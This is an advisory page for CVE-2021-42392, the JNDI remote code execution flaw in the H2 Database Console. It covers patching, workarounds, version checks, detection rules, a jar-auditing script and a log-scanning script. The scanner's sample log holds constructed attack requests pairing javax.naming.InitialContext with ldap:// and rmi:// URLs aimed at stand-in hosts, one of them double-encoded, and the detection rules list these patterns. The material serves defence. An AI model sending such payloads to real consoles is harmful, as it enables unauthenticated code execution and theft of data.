CVE-2021-42392
📋 TL;DR
CVE-2021-42392 is a critical remote code execution vulnerability in the H2 Database Engine. The method org.h2.util.JdbcUtils.getConnection takes a driver class name and a database URL, instantiates the named class and, if it is a JNDI context rather than a JDBC driver, calls lookup(url) on it. An attacker who controls both values can pass javax.naming.InitialContext together with an ldap:// or rmi:// URL pointing at a server they run; the JVM then loads and executes attacker-supplied code, either from a remote codebase on older JDKs or via a deserialization or gadget-based payload on JDKs that block remote codebases by default (8u191, 11.0.1 and later). The most exposed path is the H2 Console login form, which passes the user-supplied driver and URL straight to this method before any credential is checked, so anyone who can reach the console (default port 8082) gets unauthenticated code execution inside the hosting JVM. The console listens on localhost only unless it was started with -webAllowOthers, so real-world exposure depends on configuration. All H2 releases before 2.0.206 are affected; other paths that accept a driver name and URL, such as CREATE LINKED TABLE, reach the same method but require database access.
💻 Affected Systems
- H2 Database, all releases before 2.0.206 (the H2 Console is the unauthenticated vector)
- Oracle Communications Cloud Native Core Policy, which bundles H2 (addressed in the Oracle April 2022 Critical Patch Update linked below)
📦 What is this software?
H2 by H2database: an open-source, pure-Java SQL database that is usually embedded in an application as a library (in-memory or file-based) rather than run as a separate server, which is why the vulnerable code normally executes with the application's own privileges. The H2 Console is its browser-based SQL client, served by org.h2.tools.Server -web on port 8082 by default and shipped in the same JAR.
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the JVM that hosts the console, which is typically the application itself: the attacker runs code under the application's service account, reads every data store and secret the application can reach, and pivots to other systems in the network.
Likely Case
Remote code execution leading to data theft, ransomware deployment, or installation of persistent backdoors on the exposed host.
If Mitigated
Limited impact: with the console disabled or bound to localhost and outbound LDAP/RMI from the host blocked, the unauthenticated path is closed and the remaining vectors require valid database access.
🎯 Exploit Status
Multiple public proof-of-concept scripts and detailed technical analyses (JFrog's write-up, linked below, walks through the console path) are available. Exploitation needs nothing more than a reachable console and an attacker-run LDAP or RMI listener, so any console exposed beyond localhost on an unpatched version should be treated as exploitable.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Version 2.0.206 or later
Vendor Advisory: https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6
Restart Required: Yes
Instructions:
1. In most deployments H2 is a library inside the application rather than a standalone service: raise the com.h2database:h2 dependency to 2.0.206 or later in the build (Maven or Gradle), rebuild and redeploy. Check the resolved version, not only the declared one, since a parent BOM or a transitive dependency can pin an older release.
2. For standalone or manually deployed instances, download 2.0.206 or later from the official site or Maven Central, stop the H2 services, replace the existing H2 JAR files, and restart.
3. Plan the jump from 1.4.x carefully: H2 2.x changed the on-disk database format, so existing 1.4 databases must be exported with SCRIPT and re-imported with RUNSCRIPT on the new version rather than opened in place.
4. Verify the running version (see How to Verify) and confirm the console is disabled or bound to localhost.
🔧 Temporary Workarounds
Disable H2 Console
Completely disable the H2 Console if it is not required for operations.
Remove or comment out the H2 Console configuration in application properties (for Spring Boot: spring.h2.console.enabled=false) and do not start org.h2.tools.Server with -web.
Bind the console to localhost
The console accepts only local connections unless it was started with -webAllowOthers (Spring Boot: spring.h2.console.settings.web-allow-others=true). Remove that flag or property so the login form is unreachable from the network.
Network Access Restrictions
Restrict network access to the H2 Console port (default 8082) on Linux hosts. These rules are appended, so they only take effect if no earlier, broader ACCEPT rule already matches the port:
iptables -A INPUT -p tcp --dport 8082 -s trusted_ip -j ACCEPT
iptables -A INPUT -p tcp --dport 8082 -j DROP
🧯 If You Can't Patch
- Keep the console off the network: do not start it with -webAllowOthers, or disable it altogether, and isolate H2 hosts from untrusted networks with strict segmentation
- Block egress from the JVM host to untrusted LDAP (389/636), RMI (1099) and arbitrary high ports; the JNDI lookup needs an outbound connection to the attacker's server, so egress filtering breaks the chain even when a malicious request gets through
- Deploy WAF rules on the console endpoints (login.do and test.do) that reject a driver parameter other than org.h2.Driver and a url parameter that does not start with jdbc:, applied after URL-decoding the form body
- Run on a JDK with remote codebase loading disabled by default (8u191, 11.0.1 and later); this removes the simplest payload but not gadget- or deserialization-based ones, so it is hardening, not a mitigation
🔍 How to Verify
Check if Vulnerable:
Every H2 release before 2.0.206 contains the JNDI code path; the H2 Console is what makes it reachable without credentials. Confirm the version of a running instance from any SQL client (the console itself or the application's connection):
SELECT H2VERSION();
Check Version:
For JARs on disk, use the versioned file name (h2-2.0.206.jar) or read the manifest, which records the build as Implementation-Version:
unzip -p h2*.jar META-INF/MANIFEST.MF | grep -i version
For Maven or Gradle projects, check the resolved dependency rather than the declared one, since a parent BOM can pin an older release:
mvn dependency:tree | grep com.h2database
Verify Fix Applied:
H2VERSION() or the manifest reports 2.0.206 or higher, and the console is either disabled or running without -webAllowOthers so that the login form is reachable only from localhost.
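The checks above cover one JAR at a time. The following added example (not code from the page or from the H2 project) turns them into an audit over a whole deployment tree, including H2 nested inside Spring Boot fat jars and WARs, where a plain file listing would miss it. It assumes an H2 jar can be identified by its org/h2/engine/Constants.class entry and that the version is in the file name or in the manifest's Implementation-Version header; the tree built by demo() is constructed from stand-in jars that carry no real bytecode.

```python
"""Audit a directory tree for H2 jars older than the 2.0.206 fix for CVE-2021-42392.

Added example, not from the page or the H2 project. Assumes an H2 jar is
recognisable by org/h2/engine/Constants.class and versioned either in its file
name (h2-2.0.206.jar) or in the manifest's Implementation-Version. The demo()
tree is constructed for this example.
"""
import io
import re
import sys
import tempfile
import zipfile
from collections import namedtuple
from pathlib import Path

FIXED = (2, 0, 206)                                 # first release without the JNDI path
MARKER_CLASS = "org/h2/engine/Constants.class"      # entry present in every H2 build
H2_NAME = re.compile(r"^h2-(\d+(?:\.\d+)+)\.jar$")  # Maven Central file naming

Finding = namedtuple("Finding", "path version vulnerable")


def parse_version(text):
    """'2.0.206' -> (2, 0, 206); tuple order matches H2's numeric versioning."""
    return tuple(int(p) for p in text.split("."))


def manifest_version(zf):
    """Implementation-Version from META-INF/MANIFEST.MF, or None if absent."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def audit_jar_bytes(display_name, data, findings):
    """Inspect one jar given as bytes, then recurse into any jars it bundles."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return                                      # not a zip; nothing to learn
    with zf:
        names = zf.namelist()
        if MARKER_CLASS in names:
            match = H2_NAME.match(display_name.rsplit("/", 1)[-1])
            version = match.group(1) if match else manifest_version(zf)
            # Unknown version is reported as vulnerable: fail closed until checked.
            vulnerable = version is None or parse_version(version) < FIXED
            findings.append(Finding(display_name, version, vulnerable))
        for inner in names:                         # BOOT-INF/lib, WEB-INF/lib, ...
            if inner.endswith(".jar"):
                audit_jar_bytes(f"{display_name}!/{inner}", zf.read(inner), findings)


def audit_tree(root):
    """Return a Finding for every H2 jar under root, top-level or nested."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*.jar")):
        audit_jar_bytes(path.relative_to(root).as_posix(), path.read_bytes(), findings)
    return findings


def _jar_bytes(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def _h2_stub(version):
    """Constructed stand-in for an H2 jar: marker entry plus manifest, no bytecode."""
    manifest = ("Manifest-Version: 1.0\nImplementation-Title: H2 Database Engine\n"
                f"Implementation-Version: {version}\n")
    return {MARKER_CLASS: b"", "META-INF/MANIFEST.MF": manifest.encode()}


def demo():
    """Build a constructed deployment tree and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "lib").mkdir()
        (root / "lib" / "h2-1.4.200.jar").write_bytes(_jar_bytes(_h2_stub("1.4.200")))
        (root / "lib" / "h2-2.0.206.jar").write_bytes(_jar_bytes(_h2_stub("2.0.206")))
        # Renamed jar: the version survives only in the manifest.
        (root / "lib" / "database.jar").write_bytes(_jar_bytes(_h2_stub("2.0.204")))
        (root / "lib" / "other.jar").write_bytes(_jar_bytes({"com/example/Foo.class": b""}))
        # Spring Boot style fat jar with H2 nested under BOOT-INF/lib.
        (root / "app.jar").write_bytes(_jar_bytes({
            "BOOT-INF/classes/com/example/App.class": b"",
            "BOOT-INF/lib/h2-2.0.202.jar": _jar_bytes(_h2_stub("2.0.202")),
        }))
        return audit_tree(root)


if __name__ == "__main__":
    results = demo() if len(sys.argv) == 1 else audit_tree(sys.argv[1])
    for f in results:
        state = "VULNERABLE" if f.vulnerable else "ok"
        print(f"{state:<10} {f.version or 'unknown':<10} {f.path}")
```

Run it with a deployment directory as the argument to audit real hosts; without arguments it audits the constructed tree. A jar whose version cannot be determined is reported as vulnerable on purpose, since silently passing an unrecognised build is the failure mode that matters.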
📡 Detection & Monitoring
Log Indicators:
- H2 records little about console activity by default, so capture requests at a reverse proxy or WAF in front of port 8082: POST requests to the console's login.do or test.do whose driver parameter is not org.h2.Driver (javax.naming.InitialContext is the classic value) or whose url parameter does not start with jdbc: (ldap://, ldaps://, rmi://, iiop://, dns://). Expect these values to arrive URL-encoded or double-encoded.
- Unexpected driver classes being loaded in the application JVM, in particular javax.naming or com.sun.jndi classes reached from org.h2.util.JdbcUtils.getConnection
- Connection attempts with driver names that are not JDBC drivers at all
Network Indicators:
- Outbound LDAP (389/636), RMI (1099) or other unexpected connections from the H2 host immediately after a console request; a successful exploit commonly fetches a second-stage class or payload over HTTP from the same attacker host
- Inbound connections to the H2 Console port (default 8082) from anything other than localhost, including scans for /login.jsp or /login.do
SIEM Query:
(sourcetype=proxy_access OR sourcetype=waf) uri_path IN ("/login.do", "/test.do") ("javax.naming" OR "ldap://" OR "rmi://" OR "iiop://" OR "dns://")
Adjust the source and field names to your log pipeline. A raw string match is only a floor: encoded variants require matching on the decoded driver and url parameters.
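The indicators above hinge on decoding the console's form parameters rather than string-matching raw lines. The following added example (not code from the page or from the H2 project) does that over constructed reverse-proxy log lines in a format assumed for this example (client, method, path, then the quoted form body). It flags requests to the console's login.do and test.do endpoints whose driver is a JNDI context class or outside an allowlist, or whose url uses an LDAP/RMI-style scheme, and it handles double-encoded values that a naive filter would let through.

```python
"""Flag H2 Console connection attempts that look like CVE-2021-42392 probes.

Added example, not code from the page or the H2 project. Assumes a reverse proxy
or WAF in front of the console logs each request as
    <client> <method> <path> "<url-encoded form body>"
The lines in SAMPLE_LOG are constructed for this example.
"""
from urllib.parse import parse_qs, unquote, urlsplit

CONSOLE_ENDPOINTS = {"/login.do", "/test.do"}   # both hand driver+url to JdbcUtils.getConnection
ALLOWED_DRIVERS = {"org.h2.Driver"}             # what a legitimate console login sends
JNDI_CONTEXT_PREFIXES = ("javax.naming.", "com.sun.jndi.")
JNDI_SCHEMES = {"ldap", "ldaps", "rmi", "iiop", "iiopname", "corbaname", "dns"}

SAMPLE_LOG = """\
10.0.0.5 POST /login.do "language=en&setting=Generic+H2+%28Embedded%29&driver=org.h2.Driver&url=jdbc%3Ah2%3A~%2Ftest&user=sa&password="
203.0.113.9 POST /login.do "driver=javax.naming.InitialContext&url=ldap%3A%2F%2F203.0.113.9%3A1389%2FExploit&user=&password="
203.0.113.9 POST /test.do "driver=javax%252Enaming%252EInitialContext&url=rmi%253A%252F%252F203.0.113.9%253A1099%252Fa"
10.0.0.5 POST /query.do "sql=SELECT+1"
198.51.100.7 POST /login.do "driver=com.example.EvilDriver&url=jdbc%3Apostgresql%3A%2F%2Fdb%2Fapp&user=sa&password=x"
"""


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding; double-encoding is a common filter bypass."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(driver, url):
    """Return the reasons a (driver, url) pair is suspicious; empty list means benign."""
    reasons = []
    if driver.startswith(JNDI_CONTEXT_PREFIXES):
        reasons.append(f"driver is a JNDI context class: {driver}")
    elif driver and driver not in ALLOWED_DRIVERS:
        reasons.append(f"driver outside allowlist: {driver}")
    scheme = urlsplit(url).scheme.lower()           # 'jdbc' for legitimate URLs
    if scheme in JNDI_SCHEMES:
        reasons.append(f"url uses JNDI scheme {scheme}://")
    return reasons


def scan(log_text):
    """Parse proxy log lines and return one finding per suspicious console request."""
    findings = []
    for line in log_text.splitlines():
        head, _, quoted = line.partition(' "')
        parts = head.split()
        if len(parts) != 3 or parts[2] not in CONSOLE_ENDPOINTS:
            continue                                # other paths never reach getConnection
        client, _method, path = parts
        params = parse_qs(quoted.rstrip('"'), keep_blank_values=True)
        driver = fully_decode(params.get("driver", [""])[0])
        url = fully_decode(params.get("url", [""])[0])
        reasons = classify(driver, url)
        if reasons:
            findings.append({"client": client, "path": path, "driver": driver,
                             "url": url, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['client']} {hit['path']} -> {'; '.join(hit['reasons'])}")
```

The allowlist check matters as much as the JNDI check: a driver class that is neither org.h2.Driver nor a JNDI context is still an attempt to make the server instantiate an arbitrary class, which is worth an alert on its own.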
🔗 References
- https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6
- https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/
- https://lists.debian.org/debian-lts-announce/2022/02/msg00017.html
- https://security.netapp.com/advisory/ntap-20220119-0001/
- https://www.debian.org/security/2022/dsa-5076
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://www.secpod.com/blog/log4shell-critical-remote-code-execution-vulnerability-in-h2database-console/